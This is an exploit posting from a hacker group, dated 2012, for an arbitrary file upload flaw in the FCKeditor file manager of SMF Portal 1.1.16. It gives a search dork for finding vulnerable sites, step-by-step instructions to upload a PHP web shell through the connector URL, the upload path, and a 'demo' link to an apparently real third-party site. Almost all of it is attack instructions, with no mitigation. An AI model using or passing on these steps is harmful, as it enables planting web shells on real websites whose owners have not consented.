SMF Portal version 1.1.16 fckeditor suffers from an arbitrary file upload vulnerability.
04babd577f16ab3b3226783c0614188c3210538cd0494f5a7fa636ca41c2f6f2
In The Name Of GOD
==============================================================================
SMF Portal 1.1.16 (fckeditor) Arbitrary File Upload Vulnerability
==============================================================================
[»] Title : [ SMF Portal 1.1.16 (fckeditor) Arbitrary File Upload Vulnerability ]
[»] TestedON: [ LINUX ]
[»] Download: [ http://www.simplemachines.org/ ]
[»] Author : [ HELLBOY }
[»] Email : [ A68_HELLBOY@YAHOO.COM ]
[»] Date : [ 2012-1-20 ]
[»] Version : [ 1.1.16 ]
[»] Dork : [ "Powered by SMF 1.1.16" ]
###########################################################################
InformatioN :
1. Go to url : http://Target/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
2. SELECT You'r Shell and Click OK.
3. Formats can be uploaded (Php6, php. ,...)
4. You Must Upload This File : shel.php.
4. Uploaded File Location : Target.com/tp-images/File/File Name
###########################################################################
===[ Exploit ]===
[»] http://Target/[patch]/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
[»] http://Target/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
===[ Demo ]===
[»] http://www.repairmanualclub.com/community/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
===[ We Are : ./Iranian HackerZ ]===
Thanks To : BLACK.VIPER , SKOTE_VAHSHAT , GENERALL
TBH : HELLBOY , BLACK.VIPER , SKOTE_VAHSHAT
###########################################################################